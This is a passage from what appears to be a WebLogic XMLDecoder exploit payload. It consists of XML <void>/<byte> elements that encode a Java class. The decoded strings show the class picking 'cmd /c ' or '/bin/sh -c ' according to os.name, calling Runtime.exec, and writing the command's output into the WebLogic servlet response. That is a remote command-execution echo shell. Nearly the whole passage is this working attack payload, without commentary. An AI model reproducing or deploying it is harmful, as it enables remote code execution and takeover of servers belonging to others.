index="2334"><byte>83</byte></void><void index="2335"><byte>0</byte></void><void index="2336"><byte>84</byte></void><void index="2337"><byte>10</byte></void><void index="2338"><byte>0</byte></void><void index="2339"><byte>81</byte></void><void index="2340"><byte>0</byte></void><void index="2341"><byte>85</byte></void><void index="2342"><byte>1</byte></void><void index="2343"><byte>0</byte></void><void index="2344"><byte>5</byte></void><void index="2345"><byte>32</byte></void><void index="2346"><byte>58</byte></void><void index="2347"><byte>32</byte></void><void index="2348"><byte>13</byte></void><void index="2349"><byte>10</byte></void><void index="2350"><byte>8</byte></void><void index="2351"><byte>0</byte></void><void index="2352"><byte>87</byte></void><void index="2353"><byte>1</byte></void><void index="2354"><byte>0</byte></void><void index="2355"><byte>8</byte></void><void index="2356"><byte>116</byte></void><void index="2357"><byte>111</byte></void><void index="2358"><byte>83</byte></void><void index="2359"><byte>116</byte></void><void index="2360"><byte>114</byte></void><void index="2361"><byte>105</byte></void><void index="2362"><byte>110</byte></void><void index="2363"><byte>103</byte></void><void index="2364"><byte>1</byte></void><void index="2365"><byte>0</byte></void><void index="2366"><byte>20</byte></void><void index="2367"><byte>40</byte></void><void index="2368"><byte>41</byte></void><void index="2369"><byte>76</byte></void><void index="2370"><byte>106</byte></void><void index="2371"><byte>97</byte></void><void index="2372"><byte>118</byte></void><void index="2373"><byte>97</byte></void><void index="2374"><byte>47</byte></void><void index="2375"><byte>108</byte></void><void index="2376"><byte>97</byte></void><void index="2377"><byte>110</byte></void><void index="2378"><byte>103</byte></void><void index="2379"><byte>47</byte></void><void index="2380"><byte>83</byte></void><void index="2381"><byte>116</byte></void><void index="2382"><byte>114</byte></void><void index="2383"><byte>105</byte></void><void index="2384"><byte>110</byte></void><void index="2385"><byte>103</byte></void><void index="2386"><byte>59</byte></void><void index="2387"><byte>12</byte></void><void index="2388"><byte>0</byte></void><void index="2389"><byte>89</byte></void><void index="2390"><byte>0</byte></void><void index="2391"><byte>90</byte></void><void index="2392"><byte>10</byte></void><void index="2393"><byte>0</byte></void><void index="2394"><byte>81</byte></void><void index="2395"><byte>0</byte></void><void index="2396"><byte>91</byte></void><void index="2397"><byte>12</byte></void><void index="2398"><byte>0</byte></void><void index="2399"><byte>10</byte></void><void index="2400"><byte>0</byte></void><void index="2401"><byte>71</byte></void><void index="2402"><byte>10</byte></void><void index="2403"><byte>0</byte></void><void index="2404"><byte>79</byte></void><void index="2405"><byte>0</byte></void><void index="2406"><byte>93</byte></void><void index="2407"><byte>1</byte></void><void index="2408"><byte>0</byte></void><void index="2409"><byte>49</byte></void><void index="2410"><byte>119</byte></void><void index="2411"><byte>101</byte></void><void index="2412"><byte>98</byte></void><void index="2413"><byte>108</byte></void><void index="2414"><byte>111</byte></void><void index="2415"><byte>103</byte></void><void index="2416"><byte>105</byte></void><void index="2417"><byte>99</byte></void><void index="2418"><byte>47</byte></void><void index="2419"><byte>115</byte></void><void index="2420"><byte>101</byte></void><void index="2421"><byte>114</byte></void><void index="2422"><byte>118</byte></void><void index="2423"><byte>108</byte></void><void index="2424"><byte>101</byte></void><void index="2425"><byte>116</byte></void><void index="2426"><byte>47</byte></void><void index="2427"><byte>105</byte></void><void index="2428"><byte>110</byte></void><void index="2429"><byte>116</byte></void><void index="2430"><byte>101</byte></void><void index="2431"><byte>114</byte></void><void index="2432"><byte>110</byte></void><void index="2433"><byte>97</byte></void><void index="2434"><byte>108</byte></void><void index="2435"><byte>47</byte></void><void index="2436"><byte>83</byte></void><void index="2437"><byte>101</byte></void><void index="2438"><byte>114</byte></void><void index="2439"><byte>118</byte></void><void index="2440"><byte>108</byte></void><void index="2441"><byte>101</byte></void><void index="2442"><byte>116</byte></void><void index="2443"><byte>79</byte></void><void index="2444"><byte>117</byte></void><void index="2445"><byte>116</byte></void><void index="2446"><byte>112</byte></void><void index="2447"><byte>117</byte></void><void index="2448"><byte>116</byte></void><void index="2449"><byte>83</byte></void><void index="2450"><byte>116</byte></void><void index="2451"><byte>114</byte></void><void index="2452"><byte>101</byte></void><void index="2453"><byte>97</byte></void><void index="2454"><byte>109</byte></void><void index="2455"><byte>73</byte></void><void index="2456"><byte>109</byte></void><void index="2457"><byte>112</byte></void><void index="2458"><byte>108</byte></void><void index="2459"><byte>7</byte></void><void index="2460"><byte>0</byte></void><void index="2461"><byte>95</byte></void><void index="2462"><byte>1</byte></void><void index="2463"><byte>0</byte></void><void index="2464"><byte>11</byte></void><void index="2465"><byte>119</byte></void><void index="2466"><byte>114</byte></void><void index="2467"><byte>105</byte></void><void index="2468"><byte>116</byte></void><void index="2469"><byte>101</byte></void><void index="2470"><byte>83</byte></void><void index="2471"><byte>116</byte></void><void index="2472"><byte>114</byte></void><void index="2473"><byte>101</byte></void><void index="2474"><byte>97</byte></void><void index="2475"><byte>109</byte></void><void index="2476"><byte>1</byte></void><void index="2477"><byte>0</byte></void><void index="2478"><byte>24</byte></void><void index="2479"><byte>40</byte></void><void index="2480"><byte>76</byte></void><void index="2481"><byte>106</byte></void><void index="2482"><byte>97</byte></void><void index="2483"><byte>118</byte></void><void index="2484"><byte>97</byte></void><void index="2485"><byte>47</byte></void><void index="2486"><byte>105</byte></void><void index="2487"><byte>111</byte></void><void index="2488"><byte>47</byte></void><void index="2489"><byte>73</byte></void><void index="2490"><byte>110</byte></void><void index="2491"><byte>112</byte></void><void index="2492"><byte>117</byte></void><void index="2493"><byte>116</byte></void><void index="2494"><byte>83</byte></void><void index="2495"><byte>116</byte></void><void index="2496"><byte>114</byte></void><void index="2497"><byte>101</byte></void><void index="2498"><byte>97</byte></void><void index="2499"><byte>109</byte></void><void index="2500"><byte>59</byte></void><void index="2501"><byte>41</byte></void><void index="2502"><byte>86</byte></void><void index="2503"><byte>12</byte></void><void index="2504"><byte>0</byte></void><void index="2505"><byte>97</byte></void><void index="2506"><byte>0</byte></void><void index="2507"><byte>98</byte></void><void index="2508"><byte>10</byte></void><void index="2509"><byte>0</byte></void><void index="2510"><byte>96</byte></void><void index="2511"><byte>0</byte></void><void index="2512"><byte>99</byte></void><void index="2513"><byte>1</byte></void><void index="2514"><byte>0</byte></void><void index="2515"><byte>5</byte></void><void index="2516"><byte>102</byte></void><void index="2517"><byte>108</byte></void><void index="2518"><byte>117</byte></void><void index="2519"><byte>115</byte></void><void index="2520"><byte>104</byte></void><void index="2521"><byte>12</byte></void><void index="2522"><byte>0</byte></void><void index="2523"><byte>101</byte></void><void index="2524"><byte>0</byte></void><void index="2525"><byte>11</byte></void><void index="2526"><byte>10</byte></void><void index="2527"><byte>0</byte></void><void index="2528"><byte>96</byte></void><void index="2529"><byte>0</byte></void><void index="2530"><byte>102</byte></void><void index="2531"><byte>1</byte></void><void index="2532"><byte>0</byte></void><void index="2533"><byte>7</byte></void><void index="2534"><byte>111</byte></void><void index="2535"><byte>115</byte></void><void index="2536"><byte>46</byte></void><void index="2537"><byte>110</byte></void><void index="2538"><byte>97</byte></void><void index="2539"><byte>109</byte></void><void index="2540"><byte>101</byte></void><void index="2541"><byte>8</byte></void><void index="2542"><byte>0</byte></void><void index="2543"><byte>104</byte></void><void index="2544"><byte>1</byte></void><void index="2545"><byte>0</byte></void><void index="2546"><byte>16</byte></void><void index="2547"><byte>106</byte></void><void index="2548"><byte>97</byte></void><void index="2549"><byte>118</byte></void><void index="2550"><byte>97</byte></void><void index="2551"><byte>47</byte></void><void index="2552"><byte>108</byte></void><void index="2553"><byte>97</byte></void><void index="2554"><byte>110</byte></void><void index="2555"><byte>103</byte></void><void index="2556"><byte>47</byte></void><void index="2557"><byte>83</byte></void><void index="2558"><byte>121</byte></void><void index="2559"><byte>115</byte></void><void index="2560"><byte>116</byte></void><void index="2561"><byte>101</byte></void><void index="2562"><byte>109</byte></void><void index="2563"><byte>7</byte></void><void index="2564"><byte>0</byte></void><void index="2565"><byte>106</byte></void><void index="2566"><byte>1</byte></void><void index="2567"><byte>0</byte></void><void index="2568"><byte>11</byte></void><void index="2569"><byte>103</byte></void><void index="2570"><byte>101</byte></void><void index="2571"><byte>116</byte></void><void index="2572"><byte>80</byte></void><void index="2573"><byte>114</byte></void><void index="2574"><byte>111</byte></void><void index="2575"><byte>112</byte></void><void index="2576"><byte>101</byte></void><void index="2577"><byte>114</byte></void><void index="2578"><byte>116</byte></void><void index="2579"><byte>121</byte></void><void index="2580"><byte>12</byte></void><void index="2581"><byte>0</byte></void><void index="2582"><byte>108</byte></void><void index="2583"><byte>0</byte></void><void index="2584"><byte>59</byte></void><void index="2585"><byte>10</byte></void><void index="2586"><byte>0</byte></void><void index="2587"><byte>107</byte></void><void index="2588"><byte>0</byte></void><void index="2589"><byte>109</byte></void><void index="2590"><byte>1</byte></void><void index="2591"><byte>0</byte></void><void index="2592"><byte>16</byte></void><void index="2593"><byte>106</byte></void><void index="2594"><byte>97</byte></void><void index="2595"><byte>118</byte></void><void index="2596"><byte>97</byte></void><void index="2597"><byte>47</byte></void><void index="2598"><byte>108</byte></void><void index="2599"><byte>97</byte></void><void index="2600"><byte>110</byte></void><void index="2601"><byte>103</byte></void><void index="2602"><byte>47</byte></void><void index="2603"><byte>83</byte></void><void index="2604"><byte>116</byte></void><void index="2605"><byte>114</byte></void><void index="2606"><byte>105</byte></void><void index="2607"><byte>110</byte></void><void index="2608"><byte>103</byte></void><void index="2609"><byte>7</byte></void><void index="2610"><byte>0</byte></void><void index="2611"><byte>111</byte></void><void index="2612"><byte>1</byte></void><void index="2613"><byte>0</byte></void><void index="2614"><byte>11</byte></void><void index="2615"><byte>116</byte></void><void index="2616"><byte>111</byte></void><void index="2617"><byte>76</byte></void><void index="2618"><byte>111</byte></void><void index="2619"><byte>119</byte></void><void index="2620"><byte>101</byte></void><void index="2621"><byte>114</byte></void><void index="2622"><byte>67</byte></void><void index="2623"><byte>97</byte></void><void index="2624"><byte>115</byte></void><void index="2625"><byte>101</byte></void><void index="2626"><byte>12</byte></void><void index="2627"><byte>0</byte></void><void index="2628"><byte>113</byte></void><void index="2629"><byte>0</byte></void><void index="2630"><byte>90</byte></void><void index="2631"><byte>10</byte></void><void index="2632"><byte>0</byte></void><void index="2633"><byte>112</byte></void><void index="2634"><byte>0</byte></void><void index="2635"><byte>114</byte></void><void index="2636"><byte>1</byte></void><void index="2637"><byte>0</byte></void><void index="2638"><byte>3</byte></void><void index="2639"><byte>119</byte></void><void index="2640"><byte>105</byte></void><void index="2641"><byte>110</byte></void><void index="2642"><byte>8</byte></void><void index="2643"><byte>0</byte></void><void index="2644"><byte>116</byte></void><void index="2645"><byte>1</byte></void><void index="2646"><byte>0</byte></void><void index="2647"><byte>8</byte></void><void index="2648"><byte>99</byte></void><void index="2649"><byte>111</byte></void><void index="2650"><byte>110</byte></void><void index="2651"><byte>116</byte></void><void index="2652"><byte>97</byte></void><void index="2653"><byte>105</byte></void><void index="2654"><byte>110</byte></void><void index="2655"><byte>115</byte></void><void index="2656"><byte>1</byte></void><void index="2657"><byte>0</byte></void><void index="2658"><byte>27</byte></void><void index="2659"><byte>40</byte></void><void index="2660"><byte>76</byte></void><void index="2661"><byte>106</byte></void><void index="2662"><byte>97</byte></void><void index="2663"><byte>118</byte></void><void index="2664"><byte>97</byte></void><void index="2665"><byte>47</byte></void><void index="2666"><byte>108</byte></void><void index="2667"><byte>97</byte></void><void index="2668"><byte>110</byte></void><void index="2669"><byte>103</byte></void><void index="2670"><byte>47</byte></void><void index="2671"><byte>67</byte></void><void index="2672"><byte>104</byte></void><void index="2673"><byte>97</byte></void><void index="2674"><byte>114</byte></void><void index="2675"><byte>83</byte></void><void index="2676"><byte>101</byte></void><void index="2677"><byte>113</byte></void><void index="2678"><byte>117</byte></void><void index="2679"><byte>101</byte></void><void index="2680"><byte>110</byte></void><void index="2681"><byte>99</byte></void><void index="2682"><byte>101</byte></void><void index="2683"><byte>59</byte></void><void index="2684"><byte>41</byte></void><void index="2685"><byte>90</byte></void><void index="2686"><byte>12</byte></void><void index="2687"><byte>0</byte></void><void index="2688"><byte>118</byte></void><void index="2689"><byte>0</byte></void><void index="2690"><byte>119</byte></void><void index="2691"><byte>10</byte></void><void index="2692"><byte>0</byte></void><void index="2693"><byte>112</byte></void><void index="2694"><byte>0</byte></void><void index="2695"><byte>120</byte></void><void index="2696"><byte>1</byte></void><void index="2697"><byte>0</byte></void><void index="2698"><byte>17</byte></void><void index="2699"><byte>106</byte></void><void index="2700"><byte>97</byte></void><void index="2701"><byte>118</byte></void><void index="2702"><byte>97</byte></void><void index="2703"><byte>47</byte></void><void index="2704"><byte>108</byte></void><void index="2705"><byte>97</byte></void><void index="2706"><byte>110</byte></void><void index="2707"><byte>103</byte></void><void index="2708"><byte>47</byte></void><void index="2709"><byte>82</byte></void><void index="2710"><byte>117</byte></void><void index="2711"><byte>110</byte></void><void index="2712"><byte>116</byte></void><void index="2713"><byte>105</byte></void><void index="2714"><byte>109</byte></void><void index="2715"><byte>101</byte></void><void index="2716"><byte>7</byte></void><void index="2717"><byte>0</byte></void><void index="2718"><byte>122</byte></void><void index="2719"><byte>1</byte></void><void index="2720"><byte>0</byte></void><void index="2721"><byte>10</byte></void><void index="2722"><byte>103</byte></void><void index="2723"><byte>101</byte></void><void index="2724"><byte>116</byte></void><void index="2725"><byte>82</byte></void><void index="2726"><byte>117</byte></void><void index="2727"><byte>110</byte></void><void index="2728"><byte>116</byte></void><void index="2729"><byte>105</byte></void><void index="2730"><byte>109</byte></void><void index="2731"><byte>101</byte></void><void index="2732"><byte>1</byte></void><void index="2733"><byte>0</byte></void><void index="2734"><byte>21</byte></void><void index="2735"><byte>40</byte></void><void index="2736"><byte>41</byte></void><void index="2737"><byte>76</byte></void><void index="2738"><byte>106</byte></void><void index="2739"><byte>97</byte></void><void index="2740"><byte>118</byte></void><void index="2741"><byte>97</byte></void><void index="2742"><byte>47</byte></void><void index="2743"><byte>108</byte></void><void index="2744"><byte>97</byte></void><void index="2745"><byte>110</byte></void><void index="2746"><byte>103</byte></void><void index="2747"><byte>47</byte></void><void index="2748"><byte>82</byte></void><void index="2749"><byte>117</byte></void><void index="2750"><byte>110</byte></void><void index="2751"><byte>116</byte></void><void index="2752"><byte>105</byte></void><void index="2753"><byte>109</byte></void><void index="2754"><byte>101</byte></void><void index="2755"><byte>59</byte></void><void index="2756"><byte>12</byte></void><void index="2757"><byte>0</byte></void><void index="2758"><byte>124</byte></void><void index="2759"><byte>0</byte></void><void index="2760"><byte>125</byte></void><void index="2761"><byte>10</byte></void><void index="2762"><byte>0</byte></void><void index="2763"><byte>123</byte></void><void index="2764"><byte>0</byte></void><void index="2765"><byte>126</byte></void><void index="2766"><byte>1</byte></void><void index="2767"><byte>0</byte></void><void index="2768"><byte>7</byte></void><void index="2769"><byte>99</byte></void><void index="2770"><byte>109</byte></void><void index="2771"><byte>100</byte></void><void index="2772"><byte>32</byte></void><void index="2773"><byte>47</byte></void><void index="2774"><byte>99</byte></void><void index="2775"><byte>32</byte></void><void index="2776"><byte>8</byte></void><void index="2777"><byte>0</byte></void><void index="2778"><byte>-128</byte></void><void index="2779"><byte>1</byte></void><void index="2780"><byte>0</byte></void><void index="2781"><byte>4</byte></void><void index="2782"><byte>101</byte></void><void index="2783"><byte>120</byte></void><void index="2784"><byte>101</byte></void><void index="2785"><byte>99</byte></void><void index="2786"><byte>1</byte></void><void index="2787"><byte>0</byte></void><void index="2788"><byte>39</byte></void><void index="2789"><byte>40</byte></void><void index="2790"><byte>76</byte></void><void index="2791"><byte>106</byte></void><void index="2792"><byte>97</byte></void><void index="2793"><byte>118</byte></void><void index="2794"><byte>97</byte></void><void index="2795"><byte>47</byte></void><void index="2796"><byte>108</byte></void><void index="2797"><byte>97</byte></void><void index="2798"><byte>110</byte></void><void index="2799"><byte>103</byte></void><void index="2800"><byte>47</byte></void><void index="2801"><byte>83</byte></void><void index="2802"><byte>116</byte></void><void index="2803"><byte>114</byte></void><void index="2804"><byte>105</byte></void><void index="2805"><byte>110</byte></void><void index="2806"><byte>103</byte></void><void index="2807"><byte>59</byte></void><void index="2808"><byte>41</byte></void><void index="2809"><byte>76</byte></void><void index="2810"><byte>106</byte></void><void index="2811"><byte>97</byte></void><void index="2812"><byte>118</byte></void><void index="2813"><byte>97</byte></void><void index="2814"><byte>47</byte></void><void index="2815"><byte>108</byte></void><void index="2816"><byte>97</byte></void><void index="2817"><byte>110</byte></void><void index="2818"><byte>103</byte></void><void index="2819"><byte>47</byte></void><void index="2820"><byte>80</byte></void><void index="2821"><byte>114</byte></void><void index="2822"><byte>111</byte></void><void index="2823"><byte>99</byte></void><void index="2824"><byte>101</byte></void><void index="2825"><byte>115</byte></void><void index="2826"><byte>115</byte></void><void index="2827"><byte>59</byte></void><void index="2828"><byte>12</byte></void><void index="2829"><byte>0</byte></void><void index="2830"><byte>-126</byte></void><void index="2831"><byte>0</byte></void><void index="2832"><byte>-125</byte></void><void index="2833"><byte>10</byte></void><void index="2834"><byte>0</byte></void><void index="2835"><byte>123</byte></void><void index="2836"><byte>0</byte></void><void index="2837"><byte>-124</byte></void><void index="2838"><byte>1</byte></void><void index="2839"><byte>0</byte></void><void index="2840"><byte>11</byte></void><void index="2841"><byte>47</byte></void><void index="2842"><byte>98</byte></void><void index="2843"><byte>105</byte></void><void index="2844"><byte>110</byte></void><void index="2845"><byte>47</byte></void><void index="2846"><byte>115</byte></void><void index="2847"><byte>104</byte></void><void index="2848"><byte>32</byte></void><void index="2849"><byte>45</byte></void><void index="2850"><byte>99</byte></void><void index="2851"><byte>32</byte></void><void index="2852"><byte>8</byte></void><void index="2853"><byte>0</byte></void><void index="2854"><byte>-122</byte></void><void index="2855"><byte>1</byte></void><void index="2856"><byte>0</byte></void><void index="2857"><byte>22</byte></void><void index="2858"><byte>106</byte></void><void index="2859"><byte>97</byte></void><void index="2860"><byte>118</byte></void><void index="2861"><byte>97</byte></void><void index="2862"><byte>47</byte></void><void index="2863"><byte>105</byte></void><void index="2864"><byte>111</byte></void><void index="2865"><byte>47</byte></void><void index="2866"><byte>66</byte></void><void index="2867"><byte>117</byte></void><void index="2868"><byte>102</byte></void><void index="2869"><byte>102</byte></void><void index="2870"><byte>101</byte></void><void index="2871"><byte>114</byte></void><void index="2872"><byte>101</byte></void><void index="2873"><byte>100</byte></void><void index="2874"><byte>82</byte></void><void index="2875"><byte>101</byte></void><void index="2876"><byte>97</byte></void><void index="2877"><byte>100</byte></void><void index="2878"><byte>101</byte></void><void index="2879"><byte>114</byte></void><void index="2880"><byte>7</byte></void><void index="2881"><byte>0</byte></void><void index="2882"><byte>-120</byte></void><void index="2883"><byte>1</byte></void><void index="2884"><byte>0</byte></void><void index="2885"><byte>25</byte></void><void index="2886"><byte>106</byte></void><void index="2887"><byte>97</byte></void><void index="2888"><byte>118</byte></void><void index="2889"><byte>97</byte></void><void index="2890"><byte>47</byte></void><void index="2891"><byte>105</byte></void><void index="2892"><byte>111</byte></void><void index="2893"><byte>47</byte></void><void index="2894"><byte>73</byte></void><void index="2895"><byte>110</byte></void><void index="2896"><byte>112</byte></void><void index="2897"><byte>117</byte></void><void index="2898"><byte>116</byte></void><void index="2899"><byte>83</byte></void><void index="2900"><byte>116</byte></void><void index="2901"><byte>114</byte></void><void index="2902"><byte>101</byte></void><void index="2903"><byte>97</byte></void><void index="2904"><byte>109</byte></void><void index="2905"><byte>82</byte></void><void index="2906"><byte>101</byte></void><void index="2907"><byte>97</byte></void><void index="2908"><byte>100</byte></void><void index="2909"><byte>101</byte></void><void index="2910"><byte>114</byte></void><void index="2911"><byte>7</byte></void><void index="2912"><byte>0</byte></void><void index="2913"><byte>-118</byte></void><void index="2914"><byte>1</byte></void><void index="2915"><byte>0</byte></void><void index="2916"><byte>17</byte></void><void index="2917"><byte>106</byte></void><void index="2918"><byte>97</byte></void><void index="2919"><byte>118</byte></void><void index="2920"><byte>97</byte></void><void index="2921"><byte>47</byte></void><void index="2922"><byte>108</byte></void><void index="2923"><byte>97</byte></void><void index="2924"><byte>110</byte></void><void index="2925"><byte>103</byte></void><void index="2926"><byte>47</byte></void><void index="2927"><byte>80</byte></void><void index="2928"><byte>114</byte></void><void index="2929"><byte>111</byte></void><void index="2930"><byte>99</byte></void><void index="2931"><byte>101</byte></void><void index="2932"><byte>115</byte></void><void index="2933"><byte>115</byte></void><void index="2934"><byte>7</byte></void><void index="2935"><byte>0</byte></void><void index="2936"><byte>-116</byte></void><void index="2937"><byte>1</byte></void><void index="2938"><byte>0</byte></void><void index="2939"><byte>14</byte></void><void index="2940"><byte>103</byte></void><void index="2941"><byte>101</byte></void><void index="2942"><byte>116</byte></void><void index="2943"><byte>73</byte></void><void index="2944"><byte>110</byte></void><void index="2945"><byte>112</byte></void><void index="2946"><byte>117</byte></void><void index="2947"><byte>116</byte></void><void index="2948"><byte>83</byte></void><void index="2949"><byte>116</byte></void><void index="2950"><byte>114</byte></void><void index="2951"><byte>101</byte></void><void index="2952"><byte>97</byte></void><void index="2953"><byte>109</byte></void><void index="2954"><byte>1</byte></void><void index="2955"><byte>0</byte></void><void index="2956"><byte>23</byte></void><void index="2957"><byte>40</byte></void><void index="2958"><byte>41</byte></void><void index="2959"><byte>76</byte></void><void index="2960"><byte>106</byte></void><void index="2961"><byte>97</byte></void><void index="2962"><byte>118</byte></void><void index="2963"><byte>97</byte></void><void index="2964"><byte>47</byte></void><void index="2965"><byte>105</byte></void><void index="2966"><byte>111</byte></void><void index="2967"><byte>47</byte></void><void index="2968"><byte>73</byte></void><void index="2969"><byte>110</byte></void><void index="2970"><byte>112</byte></void><void index="2971"><byte>117</byte></void><void index="2972"><byte>116</byte></void><void index="2973"><byte>83</byte></void><void index="2974"><byte>116</byte></void><void index="2975"><byte>114</byte></void><void index="2976"><byte>101</byte></void><void index="2977"><byte>97</byte></void><void index="2978"><byte>109</byte></void><void index="2979"><byte>59</byte></void><void index="2980"><byte>12</byte></void><void index="2981"><byte>0</byte></void><void index="2982"><byte>-114</byte></void><void index="2983"><byte>0</byte></void><void index="2984"><byte>-113</byte></void><void index="2985"><byte>10</byte></void><void index="2986"><byte>0</byte></void><void index="2987"><byte>-115</byte></void><void index="2988"><byte>0</byte></void><void index="2989"><byte>-112</byte></void><void index="2990"><byte>1</byte></void><void index="2991"><byte>0</byte></void><void index="2992"><byte>42</byte></void><void index="2993"><byte>40</byte></void><void index="2994"><byte>76</byte></void><void index="2995"><byte>106</byte></void><void index="2996"><byte>97</byte></void><void index="2997"><byte>118</byte></void><void index="2998"><byte>97</byte></void><void index="2999"><byte>47</byte></void><void index="3000"><byte>105</byte></void><void index="3001"><byte>111</byte></void><void index="3002"><byte>47</byte></void><void index="3003"><byte>73</byte></void><void index="3004"><byte>110</byte></void><void index="3005"><byte>112</byte></void><void index="3006"><byte>117</byte></void><void index="3007"><byte>116</byte></void><void index="3008"><byte>83</byte></void><void index="3009"><byte>116</byte></void><void index="3010"><byte>114</byte></void><void index="3011"><byte>101</byte></void><void index="3012"><byte>97</byte></void><void index="3013"><byte>109</byte></void><void index="3014"><byte>59</byte></void><void index="3015"><byte>76</byte></void><void index="3016"><byte>106</byte></void><void index="3017"><byte>97</byte></void><void index="3018"><byte>118</byte></void><void index="3019"><byte>97</byte></void><void index="3020"><byte>47</byte></void><void index="3021"><byte>108</byte></void><void index="3022"><byte>97</byte></void><void index="3023"><byte>110</byte></void><void index="3024"><byte>103</byte></void><void index="3025"><byte>47</byte></void><void index="3026"><byte>83</byte></void><void index="3027"><byte>116</byte></void><void index="3028"><byte>114</byte></void><void index="3029"><byte>105</byte></void><void index="3030"><byte>110</byte></void><void index="3031"><byte>103</byte></void><void index="3032"><byte>59</byte></void><void index="3033"><byte>41</byte></void><void index="3034"><byte>86</byte></void><void index="3035"><byte>12</byte></void><void index="3036"><byte>0</byte></void><void index="3037"><byte>10</byte></void><void index="3038"><byte>0</byte></void><void index="3039"><byte>-110</byte></void><void index="3040"><byte>10</byte></void><void index="3041"><byte>0</byte></void><void index="3042"><byte>-117</byte></void><void index="3043"><byte>0</byte></void><void index="3044"><byte>-109</byte></void><void index="3045"><byte>1</byte></void><void index="3046"><byte>0</byte></void><void index="3047"><byte>19</byte></void><void index="3048"><byte>40</byte></void><void index="3049"><byte>76</byte></void><void index="3050"><byte>106</byte></void><void index="3051"><byte>97</byte></void><void index="3052"><byte>118</byte></void><void index="3053"><byte>97</byte></void><void index="3054"><byte>47</byte></void><void index="3055"><byte>105</byte></void><void index="3056"><byte>111</byte></void><void index="3057"><byte>47</byte></void><void index="3058"><byte>82</byte></void><void index="3059"><byte>101</byte></void><void index="3060"><byte>97</byte></void><void index="3061"><byte>100</byte></void><void index="3062"><byte>101</byte></void><void index="3063"><byte>114</byte></void><void index="3064"><byte>59</byte></void><void index="3065"><byte>41</byte></void><void index="3066"><byte>86</byte></void><void index="3067"><byte>12</byte></void><void index="3068"><byte>0</byte></void><void index="3069"><byte>10</byte></void><void index="3070"><byte>0</byte></void><void index="3071"><byte>-107</byte></void><void index="3072"><byte>10</byte></void><void index="3073"><byte>0</byte></void><void index="3074"><byte>-119</byte></void><void index="3075"><byte>0</byte></void><void index="3076"><byte>-106</byte></void><void index="3077"><byte>1</byte></void><void index="3078"><byte>0</byte></void><void index="3079"><byte>0</byte></void><void index="3080"><byte>8</byte></void><void index="3081"><byte>0</byte></void><void index="3082"><byte>-104</byte></void><void index="3083"><byte>1</byte></void><void index="3084"><byte>0</byte></void><void index="3085"><byte>8</byte></void><void index="3086"><byte>114</byte></void><void index="3087"><byte>101</byte></void><void index="3088"><byte>97</byte></void><void index="3089"><byte>100</byte></void><void index="3090"><byte>76</byte></void><void index="3091"><byte>105</byte></void><void index="3092"><byte>110</byte></void><void index="3093"><byte>101</byte></void><void index="3094"><byte>12</byte></void><void index="3095"><byte>0</byte></void><void index="3096"><byte>-102</byte></void><void index="3097"><byte>0</byte></void><void index="3098"><byte>90</byte></void><void index="3099"><byte>10</byte></void><void index="3100"><byte>0</byte></void><void index="3101"><byte>-119</byte></void><void index="3102"><byte>0</byte></void><void index="3103"><byte>-101</byte></void><void index="3104"><byte>1</byte></void><void index="3105"><byte>0</byte></void><void index="3106"><byte>9</byte></void><void index="3107"><byte>103</byte></void><void index="3108"><byte>101</byte></void><void index="3109"><byte>116</byte></void><void index="3110"><byte>87</byte></void><void index="3111"><byte>114</byte></void><void index="3112"><byte>105</byte></void><void index="3113"><byte>116</byte></void><void index="3114"><byte>101</byte></void><void index="3115"><byte>114</byte></void><void index="3116"><byte>1</byte></void><void index="3117"><byte>0</byte></void><void index="3118"><byte>23</byte></void><void index="3119"><byte>40</byte></void><void index="3120"><byte>41</byte></void><void index="3121"><byte>76</byte></void><void index="3122"><byte>106</byte></void><void index="3123"><byte>97</byte></void><void index="3124"><byte>118</byte></void><void index="3125"><byte>97</byte></void><void index="3126"><byte>47</byte></void><void index="3127"><byte>105</byte></void><void index="3128"><byte>111</byte></void><void index="3129"><byte>47</byte></void><void index="3130"><byte>80</byte></void><void index="3131"><byte>114</byte></void><void index="3132"><byte>105</byte></void><void index="3133"><byte>110</byte></void><void index="3134"><byte>116</byte></void><void index="3135"><byte>87</byte></void><void index="3136"><byte>114</byte></void><void index="3137"><byte>105</byte></void><void index="3138"><byte>116</byte></void><void index="3139"><byte>101</byte></void><void index="3140"><byte>114</byte></void><void index="3141"><byte>59</byte></void><void index="3142"><byte>12</byte></void><void index="3143"><byte>0</byte></void><void index="3144"><byte>-99</byte></void><void index="3145"><byte>0</byte></void><void index="3146"><byte>-98</byte></void><void index="3147"><byte>10</byte></void><void index="3148"><byte>0</byte></void><void index="3149"><byte>69</byte></void><void index="3150"><byte>0</byte></void><void index="3151"><byte>-97</byte></void><void index="3152"><byte>1</byte></void><void index="3153"><byte>0</byte></void><void index="3154"><byte>19</byte></void><void index="3155"><byte>106</byte></void><void index="3156"><byte>97</byte></void><void index="3157"><byte>118</byte></void><void index="3158"><byte>97</byte></void><void index="3159"><byte>47</byte></void><void index="3160"><byte>105</byte></void><void index="3161"><byte>111</byte></void><void index="3162"><byte>47</byte></void><void index="3163"><byte>80</byte></void><void index="3164"><byte>114</byte></void><void index="3165"><byte>105</byte></void><void index="3166"><byte>110</byte></void><void index="3167"><byte>116</byte></void><void index="3168"><byte>87</byte></void><void index="3169"><byte>114</byte></void><void index="3170"><byte>105</byte></void><void index="3171"><byte>116</byte></void><void index="3172"><byte>101</byte></void><void index="3173"><byte>114</byte></void><void index="3174"><byte>7</byte></void><void index="3175"><byte>0</byte></void><void index="3176"><byte>-95</byte></void><void index="3177"><byte>1</byte></void><void index="3178"><byte>0</byte></void><void index="3179"><byte>5</byte></void><void index="3180"><byte>119</byte></void><void index="3181"><byte>114</byte></void><void index="3182"><byte>105</byte></void><void index="3183"><byte>116</byte></void><void index="3184"><byte>101</byte></void><void index="3185"><byte>12</byte></void><void index="3186"><byte>0</byte></void><void index="3187"><byte>-93</byte></void><void index="3188"><byte>0</byte></void><void index="3189"><byte>71</byte></void><void index="3190"><byte>10</byte></void><void index="3191"><byte>0</byte></void><void index="3192"><byte>-94</byte></void><void index="3193"><byte>0</byte></void><void index="3194"><byte>-92</byte></void><void index="3195"><byte>1</byte></void><void index="3196"><byte>0</byte></void><void index="3197"><byte>19</byte></void><void index="3198"><byte>106</byte></void><void index="3199"><byte>97</byte></void><void index="3200"><byte>118</byte></void><void index="3201"><byte>97</byte></void><void index="3202"><byte>47</byte></void><void index="3203"><byte>108</byte></void><void index="3204"><byte>97</byte></void><void index="3205"><byte>110</byte></void><void index="3206"><byte>103</byte></void><void index="3207"><byte>47</byte></void><void index="3208"><byte>69</byte></void><void index="3209"><byte>120</byte></void><void index="3210"><byte>99</byte></void><void index="3211"><byte>101</byte></void><void index="3212"><byte>112</byte></void><void index="3213"><byte>116</byte></void><void 